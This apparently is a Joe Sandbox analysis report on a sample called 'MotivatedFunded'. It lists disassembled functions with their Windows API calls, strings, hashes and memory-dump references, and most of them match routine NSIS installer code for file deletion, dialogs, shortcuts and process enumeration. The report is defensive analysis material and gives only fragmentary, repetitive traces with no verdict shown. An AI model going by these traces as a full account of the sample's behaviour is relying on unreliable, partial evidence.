                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                    Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                    • String ID: 82D$@%F$@rD$A
                                                                    • API String ID: 3347642858-1086125096
                                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                    Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                    • API String ID: 1916479912-1189179171
                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                    Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                    Strings
                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                    • \*.*, xrefs: 00406D03
                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                    • API String ID: 2035342205-3294556389
                                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                    Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 3581403547-784952888
                                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                    Strings
                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                    • API String ID: 542301482-1377821865
                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                    Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                    Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                    • API String ID: 20674999-2124804629
                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                    • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                    Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                    • GetSysColor.USER32(?), ref: 004041AF
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                    • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                      • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                      • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                    • SendMessageW.USER32(00000000), ref: 00404251
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                    • SetCursor.USER32(00000000), ref: 004042D2
                                                                    • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                    • SetCursor.USER32(00000000), ref: 004042F6
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                    • String ID: @%F$N$open
                                                                    • API String ID: 3928313111-3849437375
                                                                    • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                    • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                    • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                    Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                      • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                    • wsprintfA.USER32 ref: 00406B4D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                    • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                    • API String ID: 565278875-1653569448
                                                                    • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                    • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
